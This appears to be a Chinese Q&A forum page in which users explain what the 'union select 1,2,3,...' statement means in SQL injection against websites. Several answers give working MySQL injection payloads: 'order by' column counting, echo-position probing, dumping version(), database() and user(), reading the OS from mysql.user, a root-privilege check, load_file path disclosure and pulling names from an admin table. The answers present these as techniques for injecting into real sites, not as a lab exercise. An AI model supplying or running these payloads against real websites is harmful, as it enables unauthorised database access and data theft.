union select 1,2,3,4,5,6,7,8,9,10,11 from 的意思?

给网站注入时,手动检测漏洞可以利用这个语句:unionselect1,2,3,4,5,6,7,8,9,10,11from但是不明白它的意思,大家可以详细的告诉我下它的含义... 给网站注入时,手动检测漏洞可以利用这个语句: union select 1,2,3,4,5,6,7,8,9,10,11 from 但是不明白它的意思,大家可以详细的告诉我下它的含义吗? 展开
 我来答
帐号已注销
2020-02-15 · TA获得超过77.1万个赞
知道小有建树答主
回答量:4168
采纳率:93%
帮助的人:168万
展开全部

通常from后面都会有一个表名,比如 admin id user之类的union select 1,2,3,4,5,6,7,8,9,10,11 from。

暴字段长度

Order by num/*

匹配字段

and 1=1 union select 1,2,3,4,5…….n/*

暴字段位置

and 1=2 union select 1,2,3,4,5…..n/*

利用内置函数暴数据库信息

version() database() user()

不用猜解可用字段暴数据库信息(有些网站不适用):

and 1=2 union all select version() /*

and 1=2 union all select database() /*

and 1=2 union all select user() /*

操作系统信息:

and 1=2 union all select @@global.version_compile_os from mysql.user /*

数据库权限:

and ord(mid(user(),1,1))=114 /* 返回正常说明为root

扩展资料:

网站的配备内容等,一旦里面的数据被某人获得或者是被修改,那么那个人就可能获得整个网站的控制权。至于怎么获得这些数据,那些MSSQL弱口令的就不说,剩下的最有可能就是利用注入漏洞。

当用户在网站外部提交一个参数进入数据库处理,然后把处理后的结果发给用户,这个是动态网页最常见的,但是这个参数一旦没有被过滤,使得我们自己构造的sql语句也可以和参数一起参与数据库操作的,那么SQL注入漏洞就会产生。

一个网站上存在外地数据提交是很正常的,一般都是用参数接受(request),然后再进行处理,而涉及于数据库操作的却占了很大的一部分。

参考资料来源:百度百科-注入

百度网友65a35ed
推荐于2018-02-26 · TA获得超过121个赞
知道答主
回答量:134
采纳率:50%
帮助的人:48万
展开全部

首先解释一下select后面几个数字的意思,1,2,3,4...,这里的几个数字纯粹是凑数的,凑够和union关键字前面的那个表的字段数一样,不然没法拼接成一个表。在sql注入的时候,在将相应位置替换成你想获得的数据,查询结果后面就会显示出来。如下图最后一行:


本回答被网友采纳
已赞过 已踩过<
你对这个回答的评价是?
评论 收起
匿名用户
推荐于2017-12-16
展开全部
通常from后面都会有一个表名 比如 admin id user之类的union select 1,2,3,4,5,6,7,8,9,10,11 from 你这里给到11说明字段长度是11 那么再继续这个语句从from后面的哪个表里面查然后返回页面就会返回1~11这几个数字中的其中几个在mysql中 有很多的注射能用到的函数 比如 user() database() version() 分别用来查看当前数据库连接的用户名,数据库名称 以及mysql的版本比如返回 3 6 7 那么你把3 6 7 替换成user() database() version() 也就是 union select 1, 2 ,user() ,4 ,5 ,loadfile(), version() ,9 ,10, 11 这样就可以在页面上爆出 用户名 绝对路径之类的 函数名得你自己换和靠前面的手动猜解
本回答被网友采纳
已赞过 已踩过<
你对这个回答的评价是?
评论 收起
少吃冰棍多弹琴
2018-10-08 · TA获得超过2404个赞
知道小有建树答主
回答量:259
采纳率:0%
帮助的人:181万
展开全部
采纳的那个回答没解决问题吧。题主问的应该是sql注入的时候这个用法,直接在http请求里面加union语句这种。1,2,3,4后面肯定跟from,一般来说,效果是from当前字段对应的服务器端的一张表。权限肯定有限制,所以要看返回的数字才能确定哪一列可以回显到客户端,而不是随便哪一列都能利用的。比如服务器返回3,说明第3列可以回显。然后再在相应列进一步猜解具体的数据,不一定非得是现成的函数,用户名和密码这种也可能猜到,比如我猜可以select 1,2,name,4 from admin,说不定就返回服务器中一个叫admin的表的name中的数据了。利用的具体方法看经验了,专业渗透测试人员或者黑客的手法会很丰富。
已赞过 已踩过<
你对这个回答的评价是?
评论 收起
收起 更多回答(2)
推荐律师服务: 若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询

为你推荐:

下载百度知道APP,抢鲜体验
使用百度知道APP,立即抢鲜体验。你的手机镜头里或许有别人想知道的答案。
扫描二维码下载
×

类别

我们会通过消息、邮箱等方式尽快将举报结果通知您。

说明

0/200

提交
取消

辅 助

模 式